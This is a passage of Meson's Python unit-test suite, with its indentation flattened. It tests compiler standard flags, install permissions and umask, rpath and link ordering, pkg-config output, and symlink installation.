self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
